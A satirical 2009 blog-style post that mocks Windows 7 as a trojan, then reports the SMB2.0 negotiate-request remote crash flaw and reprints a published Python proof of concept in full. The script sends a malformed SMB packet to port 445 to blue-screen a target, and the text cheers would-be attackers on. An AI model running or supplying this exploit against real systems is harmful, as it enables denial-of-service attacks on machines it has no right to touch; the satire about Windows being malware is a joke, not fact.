Windows Users Open Your Systems

A wonderful treat awaits those foolish enough to buy Windows again on Catch-22 day.

Get It Try It

October 2009: on the 22nd of this month the next great malware outbreak will occur on this planet and security researchers everywhere are already preparing for the coming devastation. The malware strain, dubbed 'Win32.Se7en.xBlah-A' by researchers, takes the form of a primitive operating system but in fact functions as a host for various viruses and worms subsequently injected by haXors from Russia to Rio de Janeiro.

And purchasers of this 'operating system' stand to be the great victims.

Read on to learn how to protect yourself so you too can be safe.

Characteristics

The Win32.Se7en.xBlah-A trojan appears for all practical purposes to be an ordinary albeit rather lacklustre operating system but there are giveaways such as drive letters and a third-rate graphical interface. But to the untrained Windows user eye things can seem rather normal.

The potential buyer should be on the lookout for mention of 'Microsoft', 'Windows', 'Se7en', and tag lines such 'the best program ever written'. These are indications the product is secretly destructive. The product should be avoided at all costs.

Of further concern is the recent revelation there's a heretofore unknown exploit waiting when lusers open their shrink wraps - a fatal security hole in a 'server message block' module that was not known at the time the malware went into production.

SMB2.0 NEGOTIATE PROTOCOL REQUEST Remote BSOD

Laurent Gaffié released details of a medium/high severity attack today. It attacks both the abortive Se7en as well as its predecessor. [Punters still running XP or earlier are not affected.]

Gaffié also released proof of concept code (in Python no less) so haXors everywhere can get ready in time.

#!/usr/bin/python

from socket import socket
from time import sleep

host = "IP_ADDR", 445
buff = (
"\x00\x00\x00\x90" # Begin SMB header: Session message
"\xff\x53\x4d\x42" # Server Component: SMB
"\x72\x00\x00\x00" # Negotiate Protocol
"\x00\x18\x53\xc8" # Operation 0x18 & sub 0xc853
"\x00\x26"# Process ID High: --> :) normal value should be "\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xfe"
"\x00\x00\x00\x00\x00\x6d\x00\x02\x50\x43\x20\x4e\x45\x54"
"\x57\x4f\x52\x4b\x20\x50\x52\x4f\x47\x52\x41\x4d\x20\x31"
"\x2e\x30\x00\x02\x4c\x41\x4e\x4d\x41\x4e\x31\x2e\x30\x00"
"\x02\x57\x69\x6e\x64\x6f\x77\x73\x20\x66\x6f\x72\x20\x57"
"\x6f\x72\x6b\x67\x72\x6f\x75\x70\x73\x20\x33\x2e\x31\x61"
"\x00\x02\x4c\x4d\x31\x2e\x32\x58\x30\x30\x32\x00\x02\x4c"
"\x41\x4e\x4d\x41\x4e\x32\x2e\x31\x00\x02\x4e\x54\x20\x4c"
"\x4d\x20\x30\x2e\x31\x32\x00\x02\x53\x4d\x42\x20\x32\x2e"
"\x30\x30\x32\x00"
)
s = socket()
s.connect(host)
s.send(buff)
s.close()

Any Se7en box with SMB enabled will 'crash'. Suspicion is Windows Server 2008 will also go down. And lest we forget: a crash today is a hack tomorrow. But that's for the black hats around the world to work on. They have a month and a half to get ready and that should be more than enough time.

See Also
Laurent Gaffié: SMB2.0 NEGOTIATE PROTOCOL REQUEST Remote BSOD